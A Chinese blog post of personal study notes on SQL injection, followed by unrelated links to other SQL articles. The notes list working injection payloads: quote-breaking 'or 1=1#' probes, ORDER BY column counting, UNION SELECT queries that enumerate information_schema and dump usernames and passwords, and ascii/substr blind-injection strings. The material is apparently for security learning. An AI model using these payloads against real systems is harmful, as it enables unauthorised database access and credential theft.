SQL笔记

最新推荐文章于 2024-09-29 21:50:07 发布
最新推荐文章于 2024-09-29 21:50:07 发布
阅读量65 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68515024/article/details/134310022
版权
  • 常见SQL注入类型有:
    • 按变量类型
      • 字符型
      • 数字型
    • 按从服务器接收到的响应
      • 显错注入(没有关闭错误显示,会显示mysql error)
      • 盲注(只会告诉你sql语句的执行结果true or false,不会将sql语句执行结果展示给你)
        • 基于时间
        • 基于bool
    •  堆叠查询注入
  • 常用语句
    • 先锋部队
      • or 1=1#
      • ‘ or 1=1#
      • “ or 1=1#
      • ) or 1=1#
      • ‘)or 1=1#
      • “) or 1=1#
      • “))or 1=1##可以用-+--来代替
    • 查询信息
    • 利用select语句来获取信息的前提便是得知道数据库的字段数以及哪个字段是可以输出的
      • 判断字段数
      •           ' ordes by  a#  (测试时通过不断改变a的数值并结合页面的变化来达到判断字段数的目的)
      •            例如:' ordes by  3#此时页面回显正常,直到 ' ordes by 4#此时页面回显异常。那么该数据库的字段数就为3
      • 查系统数据库名
      •          select null,null,group_concat(schema_name) from information_schema.schemata (它的用法我还是有点一知半解的)
      • 查当前数据库名
        • select null,null,...,database()
      • 查表
        • select null,null,...,group_concat(table_name) from information_schema.tables where table_schema=database()
        • select null,null,...,table_name from information_schema.tables where table_schema=database() limit 0,1
      • 查列
        • select null,null,...,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
      • 查内容
        • select null,group_concat(username,password) from users
        • (在已知表名情况下对列username,password进行查看)
  • 注入类型
    • 按变量
      • 字符
        • id=1' union select database()
        • id=1" union select database()
        • id=1') union select database()
        • id=1") union select database()
      • 数值
        • id=1 union select database()
    • 按服务器收到的响应
      • 显错注入
        • 与按变量类型类似
      • 盲注
        • 基于bool
          • left(database(),1)>’s’ //left()函数left(a,b)从左侧截取 a 的前 b
  •                                      ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 + //substr()函数,ascii()函将某个字符转换为 ascii 值;substr(a,b,c) b 位置开始,截取字符串 a c 长度;ascii(substr((select database()),1,1))=98(改变第一个1和98的值相当于将名字一个个和字母比较,从而得到完整名字)
  •                                       ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDERBY id LIMIT 0,1),1,1))>98%23 //ORD()函数同 ascii(),将字符转为 ascii 值;mid(a,b,c)从位置 b 开始,截取 a 字符串的 c
    •   正则注入(还未正式对其开展学习,只是知道有这个。http://www.cnblogs.com/lcamry/articles/5717442.html
    • 基于时间

 

 

 

 

 

 

  • 在对MySQL数据库版本在5.0以上的一般可以根据它所存在的一个用于储存数据库信息的信息数据库information_schema,其中保存着
  • 如数据库名,数据库的表,表栏的数据类型与访问权限等我们所需的有效信息。

  • information_schema

    系统数据库,记录当前数据库,表,列,用户权限等信息

    schemata

    储存MySQL所有数据库的基本信息,包括数据库名,编码类型路径等

    tables

    储存MySQL中的表信息,包括这个标识基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最新更新时间等

    columns

    储存MySQL表中的列信息,包括这个表的所有列以及每个列的信息,该列是表中的第几行,列的数据类型,权限,注释等

域谷
关注
SQL文档笔记
做一个有趣的妞儿
04-22 751
简介 结构化查询语句,无大小写区分 语法 含有两个部分: 1.DML:增删改查 2.DDL:创建删除数据库、表、索引、约束 CREATE DATABASE -- 创建新数据库 ALTER DATABASE -- 修改数据库 CREATE TABLE -- 创建新表 ALTER TABLE -- 变更(改变)数据库表 DROP TABLE -- 删除表 CREATE INDEX -- 创建索引(搜索键) DROP INDEX -- 删除索引 表格去.
SQL笔记-触发器
qq_41177135的博客
06-11 2267
SQL笔记-触发器
sql笔记
松鼠教授的博客
06-02 9535
sql笔记 2020.06.02 1. 分组去重 去重是我们经常会遇到的问题,打个比方说,由于各种原因(不管是业务上还是说是脏数据),现在我有两条重复的数据(除了ID,其余的字段都是相同的): 子查询 我这边只希望留下某一条记录作为查询结果就好了,我们可以写下以下的SQL: select * from user where id in( select min(id) from user where name = 'Java3y' and pv = 20 and time='7-25' group
[笔记] SQL笔记-While语法
wendr的博客
07-15 1921
SQL - 运维篇 第一章 SQL笔记-While语法
SQL笔记——基本表
weixin_51335655的博客
10-16 1287
sql中对基本表的修改以及定义
SQL笔记——嵌套查询
weixin_51335655的博客
10-29 1628
SQL笔记——嵌套查询
SQL基础知识笔记
Mr丶·Zhou博客
05-10 1171
SQL是一门大小写不敏感的语言,语句以英文半角分号(;)结尾,多行注释使用 /* ……*/,单行注释使用 – ……关键词:grant(赋予权限)、revoke(取消权限)、commit(提交)、rollback(回滚)*内层的查询为子查询,外层的查询为主查询。
SQL笔记9.嵌入式SQL
qq_56129271的博客
04-07 1603
SQL嵌入到其它语言中,这个时候编译需要其他方法 1.扩充主语言编译系统,使之能够处理SQL语句 2.预处理:在编译前先扫描源程序,将SQL语句翻译成目标(或主语言程序)过程代码,并将SQL执行翻译成主语言的过程调用预处理后的源程序再交给诸语言的编译系统处理 在使用时,所有的SQL语句都要加EXEC SQL在前面,后面PL/1,C时,用;,COBOL用END-EXEC 通信: 1.SQLCODE 这是一个整型变量,他会记录SQL语句的执行情况 0就是成功执行, 100就是没查到数据, 负数就是出现异常,
SQL笔记 | 分区函数PARTITION BY、RANK()、DENSE_RANK()的使用
qq_37630282的博客
05-09 2996
目录 数据 RANK()求排名 求两个班所有人的排名 nulls last row_number()求排名 dense_rank()求排名 PARTITION BY分区函数 求两个班各自排名 PARTITION BY 与 GROUP BY区别 数据 各个班级数据表 id name class goal 1 小明 一班 100 2 小东 一班 90 3 小红 二班 95 4 小西 二班.
SQL笔记SQL中的数据透视表
weixin_37537423的博客
04-03 2687
以下是在MySQL中通过SQL语句实现Excel中数据透视表/交叉表/二维表的功能。原理不作赘述,具体示例与代码如下: 1. 数据源预览 SELECT * FROM pivot_table; 2. 数据透视表 SELECT year AS "年份", SUM(CASE WHEN department = "蔬菜" THEN sale END) AS "蔬菜", SUM(CASE WHEN department = "水果" THEN sale END) AS "水果",
sql笔记sql笔记sql笔记sql笔记sql笔记sql笔记
05-25
sql笔记sql笔记sql笔记sql笔记sql笔记sql笔记
sql笔记.md
05-23
sql笔记.md
20170909学习sql笔记
04-30
标题“20170909学习sql笔记”表明这是一个关于SQL学习的资料,可能包含了一天的学习记录或者一个教程的集合。SQL,全称Structured Query Language,是用于管理和处理关系数据库的标准语言。这个标题暗示我们将探讨...
SQL笔记下载
06-12
除了这些基础操作,SQL笔记可能还会涉及更复杂的查询技术,比如联接(JOIN)、子查询、视图(VIEW)的创建和使用,以及事务处理(TRANSACTION)等。联接允许你从多个表中合并数据,子查询可以在主查询内部执行查询,...
Linux云计算 |【第四阶段】NOSQL-DAY2
小安的运维专栏
09-26 1153
Redis集群概述、部署Redis集群(配置manage管理集群主机、创建集群、访问集群、添加节点、移除节点)
PostgreSQL的表碎片
最新发布
文牧之的博客
09-29 478
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
实用SQL小总结
UntifA的博客
09-29 1222
SQL记录
sql中的regexp与like区别
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
09-26 5257
对于字符串数据的模糊匹配,REGEXP(正则表达式)和LIKE是两个非常有用的操作符。
Oracle SQL笔记大全:从基础到实践
Oracle SQL笔记 Oracle SQL是一种关系型数据库管理系统的查询语言,它广泛应用于各种企业应用系统中。下面是Oracle SQL笔记的详细知识点: 一、基本概念 * Oracle SQL是一种标准的SQL语言,它遵循ANSI/ISO SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值